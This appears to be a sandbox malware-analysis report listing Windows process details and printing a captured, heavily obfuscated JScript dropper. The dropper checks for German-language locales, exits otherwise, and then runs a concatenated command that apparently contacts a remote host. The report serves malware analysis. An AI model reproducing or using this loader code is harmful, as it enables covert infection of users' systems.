MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 15 |
Start time: | 23:34:08 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 16 |
Start time: | 23:34:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 17 |
Start time: | 23:34:08 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function xhfar() { |
|
1 | dnttp = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var vjuzmm = this[aiplly + fjaula + agdpd + olqfbogf + bugexgzr + qbhttybpq + hmcqz + teyiogi] ( this[ocyxxxv + fsmvwzl + qovowshx + agdpd + eyuanyifu + aiplly + teyiogi][habqyl + agdpd + bugexgzr + fjaula + teyiogi + bugexgzr + vbmep + sxcbeavq + ctewsit + bugexgzr + qovowshx + teyiogi] ( ocyxxxv + fsmvwzl + qovowshx + agdpd + eyuanyifu + aiplly + teyiogi + ocvimmfd + fsmvwzl + vwutccrg + bugexgzr + xlalwx + xlalwx ) [edyibf + bugexgzr + frsvlj + edyibf + bugexgzr + fjaula + unoisajqo] ( znirknp + dkamvfh + ktanoo + dqocuw + nlkiyqjaz + habqyl + bilmkc + edyibf + edyibf + ktanoo + jgwcc + dlvrag + nlkiyqjaz + bilmkc + fsmvwzl + ktanoo + edyibf + zbhordgug + habqyl + yvkkquxm + hmcqz + teyiogi + agdpd + yvkkquxm + xlalwx + rcfvmu + iaxwa + fjaula + hmcqz + bugexgzr + xlalwx + zbhordgug + qbhttybpq + hmcqz + teyiogi + bugexgzr + agdpd + hmcqz + fjaula + teyiogi + eyuanyifu + yvkkquxm + hmcqz + fjaula + xlalwx + zbhordgug + xgijxjty + yvkkquxm + qovowshx + fjaula + xlalwx + bugexgzr ), 16 ); |
|
3 | for ( xagtgcsl = 0 ; xagtgcsl < dnttp[xlalwx + bugexgzr + hmcqz + frsvlj + teyiogi + vwutccrg] ; ++ xagtgcsl ) | |
4 | { | |
5 | if ( vjuzmm == dnttp[xagtgcsl] ) | |
6 | { | |
7 | vjuzmm = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( vjuzmm !== true ) | |
12 | this[ocyxxxv + fsmvwzl + qovowshx + agdpd + eyuanyifu + aiplly + teyiogi][onfcxk + cvaefpz + eyuanyifu + teyiogi] ( ); | |
13 | this[ocyxxxv + fsmvwzl + qovowshx + agdpd + eyuanyifu + aiplly + teyiogi][habqyl + agdpd + bugexgzr + fjaula + teyiogi + bugexgzr + vbmep + sxcbeavq + ctewsit + bugexgzr + qovowshx + teyiogi] ( ocyxxxv + fsmvwzl + qovowshx + agdpd + eyuanyifu + aiplly + teyiogi + ocvimmfd + fsmvwzl + vwutccrg + bugexgzr + xlalwx + xlalwx ) [agdpd + cvaefpz + hmcqz] ( qovowshx + civltabkq + unoisajqo + rcfvmu + mxwmnc + qovowshx + rcfvmu + aiplly + yvkkquxm + zfoaw + bugexgzr + agdpd + olqfbogf + vwutccrg + bugexgzr + xlalwx + xlalwx + ocvimmfd + bugexgzr + hfpicyls + bugexgzr + rcfvmu + qdiplqeb + habqyl + yvkkquxm + civltabkq + civltabkq + fjaula + hmcqz + unoisajqo + rcfvmu + ycchhlc + qbhttybpq + hmcqz + nmzybrwbu + yvkkquxm + quwwodomo + bugexgzr + qdiplqeb + ocyxxxv + bugexgzr + sxcbeavq + edyibf + bugexgzr + xjnlzyh + cvaefpz + bugexgzr + olqfbogf + teyiogi + rcfvmu + qdiplqeb + vbmep + cvaefpz + teyiogi + ckrbzcaet + eyuanyifu + xlalwx + bugexgzr + rcfvmu + ldsku + teyiogi + bugexgzr + civltabkq + aiplly + ldsku + zbhordgug + eyuanyifu + hmcqz + nmzybrwbu + yvkkquxm + eyuanyifu + qovowshx + bugexgzr + ocvimmfd + aiplly + unoisajqo + uenpu + rcfvmu + vwutccrg + teyiogi + teyiogi + aiplly + ooqthf + mxwmnc + mxwmnc + xsqrwkh + pyspfort + llvkxbae + ocvimmfd + xsqrwkh + zkcjmuw + llvkxbae + ocvimmfd + xsqrwkh + ocvimmfd + rrkyh + qaixc + owzikurl + mxwmnc + eyuanyifu + hmcqz + nmzybrwbu + yvkkquxm + eyuanyifu + qovowshx + bugexgzr + ocvimmfd + aiplly + vwutccrg + aiplly + ycchhlc + qhzwrsd + qhzwrsd + olqfbogf + teyiogi + fjaula + agdpd + teyiogi + rcfvmu + ldsku + teyiogi + bugexgzr + civltabkq + aiplly + ldsku + zbhordgug + eyuanyifu + hmcqz + nmzybrwbu + yvkkquxm + eyuanyifu + qovowshx + bugexgzr + ocvimmfd + aiplly + unoisajqo + uenpu + qhzwrsd + qhzwrsd + qovowshx + civltabkq + unoisajqo + rcfvmu + mxwmnc + qovowshx + rcfvmu + hmcqz + bugexgzr + teyiogi + rcfvmu + cvaefpz + olqfbogf + bugexgzr + rcfvmu + zbhordgug + zbhordgug + xsqrwkh + pyspfort + llvkxbae + ocvimmfd + xsqrwkh + zkcjmuw + llvkxbae + ocvimmfd + xsqrwkh + ocvimmfd + rrkyh + qaixc + owzikurl + bsmitnepp + jmsuuqk + jmsuuqk + jmsuuqk + jmsuuqk + zbhordgug + unoisajqo + fjaula + nmzybrwbu + zfoaw + zfoaw + zfoaw + agdpd + yvkkquxm + yvkkquxm + teyiogi + zbhordgug + qhzwrsd + qhzwrsd + qovowshx + civltabkq + unoisajqo + rcfvmu + mxwmnc + qovowshx + rcfvmu + agdpd + bugexgzr + frsvlj + olqfbogf + nmzybrwbu + agdpd + llvkxbae + rrkyh + rcfvmu + mxwmnc + olqfbogf + rcfvmu + zbhordgug + zbhordgug + xsqrwkh + pyspfort + llvkxbae + ocvimmfd + xsqrwkh + zkcjmuw + llvkxbae + ocvimmfd + xsqrwkh + ocvimmfd + rrkyh + qaixc + owzikurl + bsmitnepp + jmsuuqk + jmsuuqk + jmsuuqk + jmsuuqk + zbhordgug + unoisajqo + fjaula + nmzybrwbu + zfoaw + zfoaw + zfoaw + agdpd + yvkkquxm + yvkkquxm + teyiogi + zbhordgug + rrkyh + zmvbjw + jmsuuqk + zkcjmuw + xsqrwkh + xsqrwkh + pyspfort + zmvbjw + owzikurl + xsqrwkh + llvkxbae + rrkyh + xsqrwkh + jmsuuqk + xsqrwkh + ocvimmfd + unoisajqo + xlalwx + xlalwx, 0, false ); |
|
14 | } | |
15 | civltabkq = "X"; | |
16 | civltabkq = "O"; | |
17 | civltabkq = "w"; | |
18 | civltabkq = "i"; | |
19 | civltabkq = "a"; | |
20 | civltabkq = "M"; | |
21 | civltabkq = "o"; | |
22 | civltabkq = "M"; | |
23 | civltabkq = "h"; | |
24 | civltabkq = "y"; | |
25 | civltabkq = "w"; | |
26 | civltabkq = "j"; | |
27 | civltabkq = "H"; | |
28 | civltabkq = "N"; | |
29 | civltabkq = "q"; | |
30 | civltabkq = "m"; | |
31 | vwutccrg = "t"; | |
32 | vwutccrg = "M"; | |
33 | vwutccrg = "m"; | |
34 | vwutccrg = "h"; | |
35 | vwutccrg = "t"; | |
36 | vwutccrg = "P"; | |
37 | vwutccrg = "V"; | |
38 | vwutccrg = "B"; | |
39 | vwutccrg = "L"; | |
40 | vwutccrg = "V"; | |
41 | vwutccrg = "f"; | |
42 | vwutccrg = "s"; | |
43 | vwutccrg = "h"; | |
44 | dlvrag = "h"; | |
45 | dlvrag = "j"; | |
46 | dlvrag = "q"; | |
47 | dlvrag = "T"; | |
48 | mxwmnc = "B"; | |
49 | mxwmnc = "C"; | |
50 | mxwmnc = "E"; | |
51 | mxwmnc = "l"; | |
52 | mxwmnc = "K"; | |
53 | mxwmnc = "J"; | |
54 | mxwmnc = "y"; | |
55 | mxwmnc = "D"; | |
56 | mxwmnc = "j"; | |
57 | mxwmnc = "B"; | |
58 | mxwmnc = "q"; | |
59 | mxwmnc = "I"; | |
60 | mxwmnc = "r"; | |
61 | mxwmnc = "k"; | |
62 | mxwmnc = "o"; | |
63 | mxwmnc = "h"; | |
64 | mxwmnc = "E"; | |
65 | mxwmnc = "w"; | |
66 | mxwmnc = "o"; | |
67 | mxwmnc = "c"; | |
68 | mxwmnc = "n"; | |
69 | mxwmnc = "R"; | |
70 | mxwmnc = "s"; | |
71 | mxwmnc = "c"; | |
72 | mxwmnc = "R"; | |
73 | mxwmnc = "Q"; | |
74 | mxwmnc = "L"; | |
75 | mxwmnc = "/"; | |
76 | bsmitnepp = "G"; | |
77 | bsmitnepp = "D"; | |
78 | bsmitnepp = "D"; | |
79 | bsmitnepp = "l"; | |
80 | bsmitnepp = "E"; | |
81 | bsmitnepp = "l"; | |
82 | bsmitnepp = "Z"; | |
83 | bsmitnepp = "a"; | |
84 | bsmitnepp = "W"; | |
85 | bsmitnepp = "P"; | |
86 | bsmitnepp = "@"; | |
87 | rrkyh = "I"; | |
88 | rrkyh = "e"; | |
89 | rrkyh = "H"; | |
90 | rrkyh = "2"; | |
91 | owzikurl = "I"; | |
92 | owzikurl = "O"; | |
93 | owzikurl = "p"; | |
94 | owzikurl = "s"; | |
95 | owzikurl = "Y"; | |
96 | owzikurl = "F"; | |
97 | owzikurl = "t"; | |
98 | owzikurl = "U"; | |
99 | owzikurl = "h"; | |
100 | owzikurl = "U"; | |
101 | owzikurl = "v"; | |
102 | owzikurl = "b"; | |
103 | owzikurl = "I"; | |
104 | owzikurl = "B"; | |
105 | owzikurl = "d"; | |
106 | owzikurl = "e"; | |
107 | owzikurl = "O"; | |
108 | owzikurl = "A"; | |
109 | owzikurl = "q"; | |
110 | owzikurl = "U"; | |
111 | owzikurl = "Z"; | |
112 | owzikurl = "s"; | |
113 | owzikurl = "O"; | |
114 | owzikurl = "u"; | |
115 | owzikurl = "D"; | |
116 | owzikurl = "c"; | |
117 | owzikurl = "t"; | |
118 | owzikurl = "G"; | |
119 | owzikurl = "u"; | |
120 | owzikurl = "p"; | |
121 | owzikurl = "5"; | |
122 | rcfvmu = "K"; | |
123 | rcfvmu = "i"; | |
124 | rcfvmu = "Q"; | |
125 | rcfvmu = "s"; | |
126 | rcfvmu = "l"; | |
127 | rcfvmu = "i"; | |
128 | rcfvmu = "v"; | |
129 | rcfvmu = "R"; | |
130 | rcfvmu = "H"; | |
131 | rcfvmu = "M"; | |
132 | rcfvmu = "X"; | |
133 | rcfvmu = "Q"; | |
134 | rcfvmu = "E"; | |
135 | rcfvmu = "P"; | |
136 | rcfvmu = "y"; | |
137 | rcfvmu = "c"; | |
138 | rcfvmu = "b"; | |
139 | rcfvmu = "Q"; | |
140 | rcfvmu = "g"; | |
141 | rcfvmu = "m"; | |
142 | rcfvmu = "X"; | |
143 | rcfvmu = "I"; | |
144 | rcfvmu = "Y"; | |
145 | rcfvmu = "i"; | |
146 | rcfvmu = "t"; | |
147 | rcfvmu = "C"; | |
148 | rcfvmu = "d"; | |
149 | rcfvmu = "F"; | |
150 | rcfvmu = "r"; | |
151 | rcfvmu = "u"; | |
152 | rcfvmu = "r"; | |
153 | rcfvmu = "y"; | |
154 | rcfvmu = "Z"; | |
155 | rcfvmu = "b"; | |
156 | rcfvmu = "w"; | |
157 | rcfvmu = "j"; | |
158 | rcfvmu = "a"; | |
159 | rcfvmu = " "; | |
160 | olqfbogf = "R"; | |
161 | olqfbogf = "J"; | |
162 | olqfbogf = "r"; | |
163 | olqfbogf = "h"; | |
164 | olqfbogf = "I"; | |
165 | olqfbogf = "s"; | |
166 | olqfbogf = "W"; | |
167 | olqfbogf = "i"; | |
168 | olqfbogf = "K"; | |
169 | olqfbogf = "l"; | |
170 | olqfbogf = "W"; | |
171 | olqfbogf = "m"; | |
172 | olqfbogf = "s"; | |
173 | olqfbogf = "v"; | |
174 | olqfbogf = "d"; | |
175 | olqfbogf = "N"; | |
176 | olqfbogf = "t"; | |
177 | olqfbogf = "u"; | |
178 | olqfbogf = "s"; | |
179 | olqfbogf = "o"; | |
180 | olqfbogf = "t"; | |
181 | olqfbogf = "F"; | |
182 | olqfbogf = "l"; | |
183 | olqfbogf = "V"; | |
184 | olqfbogf = "d"; | |
185 | olqfbogf = "V"; | |
186 | olqfbogf = "N"; | |
187 | olqfbogf = "a"; | |
188 | olqfbogf = "B"; | |
189 | olqfbogf = "E"; | |
190 | olqfbogf = "j"; | |
191 | olqfbogf = "q"; | |
192 | olqfbogf = "H"; | |
193 | olqfbogf = "h"; | |
194 | olqfbogf = "J"; | |
195 | olqfbogf = "L"; | |
196 | olqfbogf = "Q"; | |
197 | olqfbogf = "s"; | |
198 | hfpicyls = "Y"; | |
199 | hfpicyls = "u"; | |
200 | hfpicyls = "H"; | |
201 | hfpicyls = "u"; | |
202 | hfpicyls = "C"; | |
203 | hfpicyls = "T"; | |
204 | hfpicyls = "v"; | |
205 | hfpicyls = "t"; | |
206 | hfpicyls = "g"; | |
207 | hfpicyls = "l"; | |
208 | hfpicyls = "f"; | |
209 | hfpicyls = "T"; | |
210 | hfpicyls = "w"; | |
211 | hfpicyls = "j"; | |
212 | hfpicyls = "D"; | |
213 | hfpicyls = "f"; | |
214 | hfpicyls = "x"; | |
215 | sxcbeavq = "e"; | |
216 | sxcbeavq = "O"; | |
217 | sxcbeavq = "X"; | |
218 | sxcbeavq = "j"; | |
219 | sxcbeavq = "d"; | |
220 | sxcbeavq = "q"; | |
221 | sxcbeavq = "h"; | |
222 | sxcbeavq = "v"; | |
223 | sxcbeavq = "u"; | |
224 | sxcbeavq = "X"; | |
225 | sxcbeavq = "S"; | |
226 | sxcbeavq = "S"; | |
227 | sxcbeavq = "D"; | |
228 | sxcbeavq = "i"; | |
229 | sxcbeavq = "k"; | |
230 | sxcbeavq = "P"; | |
231 | sxcbeavq = "D"; | |
232 | sxcbeavq = "w"; | |
233 | sxcbeavq = "Y"; | |
234 | sxcbeavq = "o"; | |
235 | sxcbeavq = "G"; | |
236 | sxcbeavq = "s"; | |
237 | sxcbeavq = "H"; | |
238 | sxcbeavq = "c"; | |
239 | sxcbeavq = "n"; | |
240 | sxcbeavq = "S"; | |
241 | sxcbeavq = "S"; | |
242 | sxcbeavq = "c"; | |
243 | sxcbeavq = "z"; | |
244 | sxcbeavq = "o"; | |
245 | sxcbeavq = "H"; | |
246 | sxcbeavq = "B"; | |
247 | sxcbeavq = "Y"; | |
248 | sxcbeavq = "G"; | |
249 | sxcbeavq = "k"; | |
250 | sxcbeavq = "A"; | |
251 | sxcbeavq = "b"; | |
252 | ktanoo = "A"; | |
253 | ktanoo = "D"; | |
254 | ktanoo = "g"; | |
255 | ktanoo = "p"; | |
256 | ktanoo = "c"; | |
257 | ktanoo = "H"; | |
258 | ktanoo = "b"; | |
259 | ktanoo = "o"; | |
260 | ktanoo = "k"; | |
261 | ktanoo = "N"; | |
262 | ktanoo = "E"; | |
263 | ktanoo = "p"; | |
264 | ktanoo = "K"; | |
265 | ktanoo = "u"; | |
266 | ktanoo = "D"; | |
267 | ktanoo = "z"; | |
268 | ktanoo = "U"; | |
269 | ktanoo = "R"; | |
270 | ktanoo = "o"; | |
271 | ktanoo = "o"; | |
272 | ktanoo = "s"; | |
273 | ktanoo = "m"; | |
274 | ktanoo = "E"; | |
275 | qaixc = "t"; | |
276 | qaixc = "A"; | |
277 | qaixc = "I"; | |
278 | qaixc = "d"; | |
279 | qaixc = "g"; | |
280 | qaixc = "T"; | |
281 | qaixc = "G"; | |
282 | qaixc = "D"; | |
283 | qaixc = "k"; | |
284 | qaixc = "W"; | |
285 | qaixc = "n"; | |
286 | qaixc = "x"; | |
287 | qaixc = "l"; | |
288 | qaixc = "S"; | |
289 | qaixc = "o"; | |
290 | qaixc = "0"; | |
291 | zkcjmuw = "w"; | |
292 | zkcjmuw = "E"; | |
293 | zkcjmuw = "Q"; | |
294 | zkcjmuw = "i"; | |
295 | zkcjmuw = "L"; | |
296 | zkcjmuw = "K"; | |
297 | zkcjmuw = "F"; | |
298 | zkcjmuw = "i"; | |
299 | zkcjmuw = "R"; | |
300 | zkcjmuw = "4"; | |
301 | ocvimmfd = "B"; | |
302 | ocvimmfd = "k"; | |
303 | ocvimmfd = "b"; | |
304 | ocvimmfd = "."; | |
305 | agdpd = "N"; | |
306 | agdpd = "i"; | |
307 | agdpd = "y"; | |
308 | agdpd = "v"; | |
309 | agdpd = "Y"; | |
310 | agdpd = "g"; | |
311 | agdpd = "e"; | |
312 | agdpd = "j"; | |
313 | agdpd = "Y"; | |
314 | agdpd = "v"; | |
315 | agdpd = "H"; | |
316 | agdpd = "n"; | |
317 | agdpd = "c"; | |
318 | agdpd = "v"; | |
319 | agdpd = "p"; | |
320 | agdpd = "s"; | |
321 | agdpd = "j"; | |
322 | agdpd = "z"; | |
323 | agdpd = "B"; | |
324 | agdpd = "P"; | |
325 | agdpd = "l"; | |
326 | agdpd = "q"; | |
327 | agdpd = "f"; | |
328 | agdpd = "F"; | |
329 | agdpd = "K"; | |
330 | agdpd = "b"; | |
331 | agdpd = "T"; | |
332 | agdpd = "A"; | |
333 | agdpd = "r"; | |
334 | agdpd = "n"; | |
335 | agdpd = "M"; | |
336 | agdpd = "h"; | |
337 | agdpd = "L"; | |
338 | agdpd = "l"; | |
339 | agdpd = "U"; | |
340 | agdpd = "r"; | |
341 | agdpd = "t"; | |
342 | agdpd = "A"; | |
343 | agdpd = "W"; | |
344 | agdpd = "P"; | |
345 | agdpd = "V"; | |
346 | agdpd = "m"; | |
347 | agdpd = "r"; | |
348 | qdiplqeb = "s"; | |
349 | qdiplqeb = "j"; | |
350 | qdiplqeb = "M"; | |
351 | qdiplqeb = "L"; | |
352 | qdiplqeb = "b"; | |
353 | qdiplqeb = "q"; | |
354 | qdiplqeb = "g"; | |
355 | qdiplqeb = "b"; | |
356 | qdiplqeb = "T"; | |
357 | qdiplqeb = "b"; | |
358 | qdiplqeb = "n"; | |
359 | qdiplqeb = "o"; | |
360 | qdiplqeb = "h"; | |
361 | qdiplqeb = "s"; | |
362 | qdiplqeb = "e"; | |
363 | qdiplqeb = "A"; | |
364 | qdiplqeb = "w"; | |
365 | qdiplqeb = "o"; | |
366 | qdiplqeb = "g"; | |
367 | qdiplqeb = "h"; | |
368 | qdiplqeb = "p"; | |
369 | qdiplqeb = "o"; | |
370 | qdiplqeb = "m"; | |
371 | qdiplqeb = "O"; | |
372 | qdiplqeb = "h"; | |
373 | qdiplqeb = "p"; | |
374 | qdiplqeb = "U"; | |
375 | qdiplqeb = "Z"; | |
376 | qdiplqeb = "z"; | |
377 | qdiplqeb = "Q"; | |
378 | qdiplqeb = "V"; | |
379 | qdiplqeb = "m"; | |
380 | qdiplqeb = "-"; | |
381 | znirknp = "P"; | |
382 | znirknp = "j"; | |
383 | znirknp = "j"; | |
384 | znirknp = "Z"; | |
385 | znirknp = "h"; | |
386 | znirknp = "H"; | |
387 | qbhttybpq = "N"; | |
388 | qbhttybpq = "X"; | |
389 | qbhttybpq = "y"; | |
390 | qbhttybpq = "x"; | |
391 | qbhttybpq = "F"; | |
392 | qbhttybpq = "B"; | |
393 | qbhttybpq = "Z"; | |
394 | qbhttybpq = "E"; | |
395 | qbhttybpq = "t"; | |
396 | qbhttybpq = "U"; | |
397 | qbhttybpq = "r"; | |
398 | qbhttybpq = "j"; | |
399 | qbhttybpq = "p"; | |
400 | qbhttybpq = "j"; | |
401 | qbhttybpq = "f"; | |
402 | qbhttybpq = "T"; | |
403 | qbhttybpq = "X"; | |
404 | qbhttybpq = "r"; | |
405 | qbhttybpq = "G"; | |
406 | qbhttybpq = "q"; | |
407 | qbhttybpq = "R"; | |
408 | qbhttybpq = "O"; | |
409 | qbhttybpq = "M"; | |
410 | qbhttybpq = "n"; | |
411 | qbhttybpq = "y"; | |
412 | qbhttybpq = "F"; | |
413 | qbhttybpq = "c"; | |
414 | qbhttybpq = "Y"; | |
415 | qbhttybpq = "O"; | |
416 | qbhttybpq = "m"; | |
417 | qbhttybpq = "x"; | |
418 | qbhttybpq = "P"; | |
419 | qbhttybpq = "e"; | |
420 | qbhttybpq = "e"; | |
421 | qbhttybpq = "Y"; | |
422 | qbhttybpq = "B"; | |
423 | qbhttybpq = "a"; | |
424 | qbhttybpq = "v"; | |
425 | qbhttybpq = "I"; | |
426 | jmsuuqk = "V"; | |
427 | jmsuuqk = "V"; | |
428 | jmsuuqk = "E"; | |
429 | jmsuuqk = "N"; | |
430 | jmsuuqk = "V"; | |
431 | jmsuuqk = "F"; | |
432 | jmsuuqk = "X"; | |
433 | jmsuuqk = "S"; | |
434 | jmsuuqk = "l"; | |
435 | jmsuuqk = "P"; | |
436 | jmsuuqk = "z"; | |
437 | jmsuuqk = "h"; | |
438 | jmsuuqk = "f"; | |
439 | jmsuuqk = "q"; | |
440 | jmsuuqk = "b"; | |
441 | jmsuuqk = "i"; | |
442 | jmsuuqk = "G"; | |
443 | jmsuuqk = "f"; | |
444 | jmsuuqk = "T"; | |
445 | jmsuuqk = "p"; | |
446 | jmsuuqk = "t"; | |
447 | jmsuuqk = "U"; | |
448 | jmsuuqk = "u"; | |
449 | jmsuuqk = "t"; | |
450 | jmsuuqk = "c"; | |
451 | jmsuuqk = "d"; | |
452 | jmsuuqk = "v"; | |
453 | jmsuuqk = "F"; | |
454 | jmsuuqk = "Q"; | |
455 | jmsuuqk = "N"; | |
456 | jmsuuqk = "O"; | |
457 | jmsuuqk = "L"; | |
458 | jmsuuqk = "C"; | |
459 | jmsuuqk = "w"; | |
460 | jmsuuqk = "u"; | |
461 | jmsuuqk = "W"; | |
462 | jmsuuqk = "H"; | |
463 | jmsuuqk = "H"; | |
464 | jmsuuqk = "8"; | |
465 | hmcqz = "G"; | |
466 | hmcqz = "n"; | |
467 | ldsku = "z"; | |
468 | ldsku = "p"; | |
469 | ldsku = "c"; | |
470 | ldsku = "E"; | |
471 | ldsku = "%"; | |
472 | llvkxbae = "h"; | |
473 | llvkxbae = "Y"; | |
474 | llvkxbae = "c"; | |
475 | llvkxbae = "C"; | |
476 | llvkxbae = "A"; | |
477 | llvkxbae = "p"; | |
478 | llvkxbae = "A"; | |
479 | llvkxbae = "s"; | |
480 | llvkxbae = "H"; | |
481 | llvkxbae = "f"; | |
482 | llvkxbae = "k"; | |
483 | llvkxbae = "f"; | |
484 | llvkxbae = "m"; | |
485 | llvkxbae = "W"; | |
486 | llvkxbae = "V"; | |
487 | llvkxbae = "z"; | |
488 | llvkxbae = "I"; | |
489 | llvkxbae = "Z"; | |
490 | llvkxbae = "c"; | |
491 | llvkxbae = "X"; | |
492 | llvkxbae = "H"; | |
493 | llvkxbae = "3"; | |
494 | teyiogi = "R"; | |
495 | teyiogi = "J"; | |
496 | teyiogi = "H"; | |
497 | teyiogi = "f"; | |
498 | teyiogi = "R"; | |
499 | teyiogi = "Z"; | |
500 | teyiogi = "Y"; | |
501 | teyiogi = "f"; | |
502 | teyiogi = "E"; | |
503 | teyiogi = "I"; | |
504 | teyiogi = "L"; | |
505 | teyiogi = "k"; | |
506 | teyiogi = "p"; | |
507 | teyiogi = "L"; | |
508 | teyiogi = "g"; | |
509 | teyiogi = "j"; | |
510 | teyiogi = "c"; | |
511 | teyiogi = "f"; | |
512 | teyiogi = "F"; | |
513 | teyiogi = "U"; | |
514 | teyiogi = "n"; | |
515 | teyiogi = "T"; | |
516 | teyiogi = "e"; | |
517 | teyiogi = "f"; | |
518 | teyiogi = "x"; | |
519 | teyiogi = "w"; | |
520 | teyiogi = "b"; | |
521 | teyiogi = "x"; | |
522 | teyiogi = "f"; | |
523 | teyiogi = "t"; | |
524 | zfoaw = "C"; | |
525 | zfoaw = "h"; | |
526 | zfoaw = "u"; | |
527 | zfoaw = "S"; | |
528 | zfoaw = "c"; | |
529 | zfoaw = "I"; | |
530 | zfoaw = "Q"; | |
531 | zfoaw = "p"; | |
532 | zfoaw = "M"; | |
533 | zfoaw = "u"; | |
534 | zfoaw = "o"; | |
535 | zfoaw = "m"; | |
536 | zfoaw = "J"; | |
537 | zfoaw = "k"; | |
538 | zfoaw = "N"; | |
539 | zfoaw = "y"; | |
540 | zfoaw = "H"; | |
541 | zfoaw = "E"; | |
542 | zfoaw = "d"; | |
543 | zfoaw = "q"; | |
544 | zfoaw = "w"; | |
545 | yvkkquxm = "J"; | |
546 | yvkkquxm = "Q"; | |
547 | yvkkquxm = "w"; | |
548 | yvkkquxm = "i"; | |
549 | yvkkquxm = "y"; | |
550 | yvkkquxm = "B"; | |
551 | yvkkquxm = "O"; | |
552 | yvkkquxm = "D"; | |
553 | yvkkquxm = "N"; | |
554 | yvkkquxm = "R"; | |
555 | yvkkquxm = "N"; | |
556 | yvkkquxm = "k"; | |
557 | yvkkquxm = "w"; | |
558 | yvkkquxm = "X"; | |
559 | yvkkquxm = "q"; | |
560 | yvkkquxm = "T"; | |
561 | yvkkquxm = "P"; | |
562 | yvkkquxm = "h"; | |
563 | yvkkquxm = "S"; | |
564 | yvkkquxm = "A"; | |
565 | yvkkquxm = "m"; | |
566 | yvkkquxm = "k"; | |
567 | yvkkquxm = "I"; | |
568 | yvkkquxm = "z"; | |
569 | yvkkquxm = "a"; | |
570 | yvkkquxm = "u"; | |
571 | yvkkquxm = "i"; | |
572 | yvkkquxm = "k"; | |
573 | yvkkquxm = "g"; | |
574 | yvkkquxm = "p"; | |
575 | yvkkquxm = "t"; | |
576 | yvkkquxm = "o"; | |
577 | ocyxxxv = "h"; | |
578 | ocyxxxv = "h"; | |
579 | ocyxxxv = "k"; | |
580 | ocyxxxv = "p"; | |
581 | ocyxxxv = "f"; | |
582 | ocyxxxv = "E"; | |
583 | ocyxxxv = "P"; | |
584 | ocyxxxv = "f"; | |
585 | ocyxxxv = "d"; | |
586 | ocyxxxv = "b"; | |
587 | ocyxxxv = "o"; | |
588 | ocyxxxv = "k"; | |
589 | ocyxxxv = "g"; | |
590 | ocyxxxv = "D"; | |
591 | ocyxxxv = "P"; | |
592 | ocyxxxv = "W"; | |
593 | xsqrwkh = "X"; | |
594 | xsqrwkh = "K"; | |
595 | xsqrwkh = "i"; | |
596 | xsqrwkh = "o"; | |
597 | xsqrwkh = "x"; | |
598 | xsqrwkh = "N"; | |
599 | xsqrwkh = "Q"; | |
600 | xsqrwkh = "V"; | |
601 | xsqrwkh = "Z"; | |
602 | xsqrwkh = "M"; | |
603 | xsqrwkh = "W"; | |
604 | xsqrwkh = "x"; | |
605 | xsqrwkh = "c"; | |
606 | xsqrwkh = "B"; | |
607 | xsqrwkh = "e"; | |
608 | xsqrwkh = "D"; | |
609 | xsqrwkh = "g"; | |
610 | xsqrwkh = "t"; | |
611 | xsqrwkh = "y"; | |
612 | xsqrwkh = "o"; | |
613 | xsqrwkh = "i"; | |
614 | xsqrwkh = "i"; | |
615 | xsqrwkh = "M"; | |
616 | xsqrwkh = "j"; | |
617 | xsqrwkh = "Q"; | |
618 | xsqrwkh = "X"; | |
619 | xsqrwkh = "R"; | |
620 | xsqrwkh = "D"; | |
621 | xsqrwkh = "r"; | |
622 | xsqrwkh = "c"; | |
623 | xsqrwkh = "I"; | |
624 | xsqrwkh = "1"; | |
625 | vbmep = "r"; | |
626 | vbmep = "x"; | |
627 | vbmep = "s"; | |
628 | vbmep = "r"; | |
629 | vbmep = "K"; | |
630 | vbmep = "Z"; | |
631 | vbmep = "P"; | |
632 | vbmep = "y"; | |
633 | vbmep = "n"; | |
634 | vbmep = "x"; | |
635 | vbmep = "A"; | |
636 | vbmep = "p"; | |
637 | vbmep = "y"; | |
638 | vbmep = "o"; | |
639 | vbmep = "q"; | |
640 | vbmep = "F"; | |
641 | vbmep = "k"; | |
642 | vbmep = "s"; | |
643 | vbmep = "r"; | |
644 | vbmep = "O"; | |
645 | quwwodomo = "X"; | |
646 | quwwodomo = "k"; | |
647 | cvaefpz = "W"; | |
648 | cvaefpz = "I"; | |
649 | cvaefpz = "I"; | |
650 | cvaefpz = "a"; | |
651 | cvaefpz = "S"; | |
652 | cvaefpz = "p"; | |
653 | cvaefpz = "a"; | |
654 | cvaefpz = "u"; | |
655 | xlalwx = "j"; | |
656 | xlalwx = "w"; | |
657 | xlalwx = "E"; | |
658 | xlalwx = "B"; | |
659 | xlalwx = "d"; | |
660 | xlalwx = "p"; | |
661 | xlalwx = "l"; | |
662 | fsmvwzl = "K"; | |
663 | fsmvwzl = "p"; | |
664 | fsmvwzl = "K"; | |
665 | fsmvwzl = "y"; | |
666 | fsmvwzl = "i"; | |
667 | fsmvwzl = "l"; | |
668 | fsmvwzl = "s"; | |
669 | fsmvwzl = "U"; | |
670 | fsmvwzl = "T"; | |
